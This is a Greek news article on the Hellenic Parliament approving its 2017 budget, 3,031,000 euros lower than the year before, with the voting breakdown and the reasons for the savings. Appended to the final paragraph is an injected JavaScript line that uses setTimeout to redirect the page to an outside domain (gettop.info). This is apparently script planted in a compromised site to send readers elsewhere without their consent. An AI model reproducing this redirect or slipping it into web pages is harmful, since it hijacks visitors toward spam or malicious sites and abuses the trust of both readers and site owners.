Προϋπολογισμός Βουλής: Υπερψηφίστηκε μειωμένος κατά 3.031.000 ευρώ

0
4

 

Κατά 3 εκατ. ευρώ είναι μειωμένος ο προϋπολογισμός της Βουλής για το 2017, όπως εγκρίθηκε απόψε από την Ολομέλεια με ευρεία πλειοψηφία. Καταψήφισε μόνον η ΧΑ, ενώ το ΚΚΕ και η Ένωση Κεντρώων δήλωσαν «παρών».

Με εγγεγραμμένες πιστώσεις ποσού 132.985.000 ευρώ, υπερκαλύπτεται ο στόχος που τέθηκε με το Μεσοπρόθεσμο Πρόγραμμα για το Κοινοβούλιο.

Ο προϋπολογισμός του 2017 είναι μειωμένος κατά 3.031.000 ευρώ, σε σχέση με εκείνον του 2016, παρά την επιβάρυνση των δαπανών της Βουλής, αφ’ ενός από τη νέα εργοδοτική εισφορά για τα ασφαλιστικά ταμεία που περιλαμβάνονται στον υπό συγκρότηση από 1ης Ιανουαρίου 2017 Ενιαίο Φορέα Κύριας Ασφάλισης, αφ’ ετέρου από την εφαρμογή της ομόφωνης απόφασης της Ολομέλειας για συμβάσεις υπηρεσιών καθαριότητας με προσωπικό από ευπαθείς κοινωνικές ομάδες (ανέργους), καθώς και με γυναίκες που είναι θύματα βίας ή απασχολούνταν στα ιδιωτικά συνεργεία καθαρισμού των οποίων οι συμβάσεις δεν ανανεώθηκαν.

Η περιστολή των δαπανών, φέτος, πραγματοποιείται κυρίως με τη λύση της σύμβασης μίσθωσης κτιρίου και την μεταφορά των υπηρεσιών σε ενιαίο κτίριο με χαμηλότερο μίσθωμα, την μείωση του μισθώματος, ήδη μισθωμένων κτιρίων, καθώς και στην παύση της συνεργασίας με ιδιωτικά συνεργεία καθαριότητας. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here